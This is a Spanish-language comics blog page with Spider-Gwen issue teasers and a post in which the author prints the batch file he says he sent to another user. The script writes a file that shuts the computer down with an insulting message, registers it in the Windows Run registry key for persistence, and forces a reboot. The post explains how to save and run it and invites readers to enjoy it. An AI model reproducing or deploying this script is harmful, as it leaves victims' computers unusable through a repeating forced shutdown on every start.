• SPIDER GWEN 2

    Spider-Gwen despierta sobre un barco contenedor de basura, que navega sobre el Hudson. Al recuperar la conciencia nota que a su lado esta Spider-Ham (que obviamente es producto del golpe que sufrió Spider-Gwen en la cabeza al momento de caer). Gwen no recuerda la forma en que pudo escapar de Vulture pero Spider-Ham poco a poco le va recordando la manera en que pudo realizar esa hazaña [...]

  • SPIDER GWEN 1

    Al ir a una demostración de radiactividad, Gwen Stacy fue mordida por una araña radioactiva que le dio sorprendentes poderes [...]

Por si alguien se lo preguntaba...

Posted by Dragón Azul On 7:33:00 p. m. 1 comentarios

Es sabido que un servidor le mando un archivo no grato a Clonador, pero muchos se preguntarán ¿Que le mando a Clonador?. Pues aqui les pongo los comandos en los que consistia ese archivo batch para que no los chamaqueen.

ADVERTENCIA: ESTE CODIGO TE PUEDE HACER PASAR UN MAL RATO, SE RECOMIENDA SOLO VERLO..

@ echo off
echo @ echo off >>c:\ccc.bat
echo shutdown -s -t 30 -c "Aqui esta mi juego hijo de puta" >>c:\ccc.bat
reg add HKLM\software\microsoft\windows\currentversion\run /v bbb /d c:\ccc.bat
shutdown -r -t 5

Se copia lo de arriba en block de notas y se guarda por ejemplo como "aaa.bat".
Al darle doble click te reiniciará la computadora y al volverse a prender se apagará sola.

Disfrutenlo, si alguien se ve afectado por este aviseme para que suba la cura por asi decirlo. Suerte y que gane Pachuca la final.

Categories: ,

1 Response for the "Por si alguien se lo preguntaba..."

  1. HOLA AMIGO..BUEN BLOG, ME GUSTARON TUS GIFS DE CIVIL WAR, AVER SI ME DICES COMO HACER UNA JEJE, BUENO TE PASO MI BLOG PARA QUE LO VEAS Y SI ME KIERES LINKEAR YO TE LINKEO
    http://planetadecomics.blogspot.com/
    GRACIAS

Publicar un comentario

Tu opinion es importante para mejorar el blog y saber lo que te gusta ¡Gracias por participar!